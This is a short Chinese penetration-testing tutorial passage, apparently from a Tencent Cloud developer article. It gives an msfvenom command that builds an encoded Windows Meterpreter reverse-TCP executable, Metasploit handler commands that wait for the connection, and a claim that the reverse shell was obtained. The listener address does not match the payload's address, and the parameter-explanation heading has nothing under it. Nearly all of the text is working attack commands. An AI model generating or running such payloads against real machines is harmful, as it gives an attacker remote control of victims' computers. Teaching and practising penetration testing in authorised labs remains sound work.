msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.5.209 LPORT=4444 -e x86/33 -f exe -o yue.exe
参数说明:
配置参数:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.232.129
set LPORT 4444
exploit
成功得到反弹
具体攻击细节,我们将会在第二节演示!
版权属于:逍遥子大表哥
本文链接:https://cloud.tencent.com/developer/article/1920560
按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。